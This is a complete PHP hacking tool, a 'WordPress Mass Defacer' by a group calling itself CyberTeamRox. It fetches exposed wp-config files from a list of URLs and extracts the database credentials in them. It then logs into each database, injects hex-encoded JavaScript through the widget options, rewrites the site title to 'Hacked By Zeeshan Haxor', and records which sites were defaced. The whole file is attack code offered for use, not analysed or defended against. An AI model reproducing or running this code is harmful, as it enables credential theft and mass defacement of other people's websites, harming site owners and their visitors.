WordPress Mass Defacer | CyberTeamRox

1. <?php
2. /**
3. * @fb : https://www.facebook.com/Cyberteamrox3/
4. * @contact: https://www.facebook.com/zee.gov
5. */
6.  
7. set_time_limit(0);
8. ini_set('display_errors', 0);
9.  
10. echo '<html><head>
11. <title>WordPress Mass Defacer | CyberTeamRox</title>
12. <meta content="text/html; charset=utf-8">
13. <meta name="keywords" content="WordPress Mass Defacer | CyberTeamRox" />
14. <meta name="description" content="WordPress Mass Defacer | CyberTeamRox" />
15. <link href="https://pbs.twimg.com/profile_images/576236156573995008/MBmY1005.jpg" rel="SHORTCUT ICON" />
16. <meta name="author" content="Zeeshan Haxor" />
17. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
18. <style type="text/css">body { background: url("http://p1.pichost.me/i/13/1360479.jpgg") bottom right no-repeat fixed; background-color:black; td {text-color:white; text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px red;}</style>
19. </head><body>';
20. echo '<center><div style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: bold;"><font style="color:yellow;size="2";text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px yellow;">WordPress Mass Defacer<br>_CyberTeamRox</div><br/><img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcQJLjYMEd-uAlqgf_RPIGxFcrcVJtvQ3BSERUbp2GVbby3Tc3s8"></center><br>';
21.  
22. echo '<form method="POST" action="" ><center><table border="1">
23. <tr><td style="color: rgb(255, 255, 255);" >Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
24. <tr><td style="color: rgb(255, 255, 255);">Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
25. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
26.  
27. if ($_POST['action']=='1'){
28. if ($_POST['url']==''){
29. echo "<center><div class='result'>No Config Found! <br>Make sure you provided a config list!</div><br>";
30. }else{
31. $url=$_POST['url'];
32. $users = explode("\n",$url);
33. foreach ($users as $user) {
34. $user1=trim($user);
35. $code=file_get_contents2($user1);
36. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
37. $db=$b1[1][0];
38. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
39. $user=$b2[1][0];
40. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
41. $db_password=$b3[1][0];
42. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
43. $host=$b4[1][0];
44. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
45. $p=$b5[1][0];
46.  
47. $d=@mysql_connect( $host, $user, $db_password ) ;
48. if ($d){
49. @mysql_select_db($db );
50. $source=stripslashes($_POST['index']);
51. $s2=strToHex(($source));
52. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
53. $ls=strlen($s)-2;
54. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
55. mysql_query($sql) ;
56. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
57. mysql_query($sql) ;
58. if (function_exists("mb_convert_encoding") )
59. {
60. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
61. $source2=mysql_real_escape_string($source2);
62. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked By Zeeshan Haxor || CyberTeamRox' WHERE `option_name` = 'blogname';"; // Change to your Nick
63. @mysql_query($sql) ; ;
64. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked by Zeeshan Haxor' WHERE `option_name` = 'blogdescription';"; // Change to your Nick
65. @mysql_query($sql) ; ;
66. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
67. @mysql_query($sql) ; ;
68. }
69. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
70. $siteurl=@mysql_fetch_array($aa) ;
71. $siteurl=$siteurl['option_value'];
72. $tr.="$siteurl\n";
73. mysql_close();
74. }
75. }
76. if ($tr)
77. $filename = 'list.txt';
78. $fp = fopen($filename, "a+");
79. $write = fputs($fp, $tr);
80. fclose($fp);
81. echo "<center><div class='result'>Defacing Completed 1337 xd ! :)<br><br>";
82. echo "<center><a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
83. echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
84. }
85. }
86.  
87. function strToHex($string)
88. {
89. $hex='';
90. for ($i=0; $i < strlen($string); $i++)
91. {
92. if (strlen(dechex(ord($string[$i])))==1){
93. $hex .="%0". dechex(ord($string[$i]));
94. }
95. else
96. {
97. $hex .="%". dechex(ord($string[$i]));
98. }
99. }
100. return $hex;
101. }
102.  
103. function file_get_contents2($u){
104.  
105. $ch = curl_init();
106. curl_setopt($ch,CURLOPT_URL,$u);
107. curl_setopt($ch, CURLOPT_HEADER, 0);
108. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
109. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
110. $result = curl_exec($ch);
111. return $result ;
112. }
113. echo "<center><br><br>&#169; Zeeshan Haxor || CyberTeamRox ";
114. ?>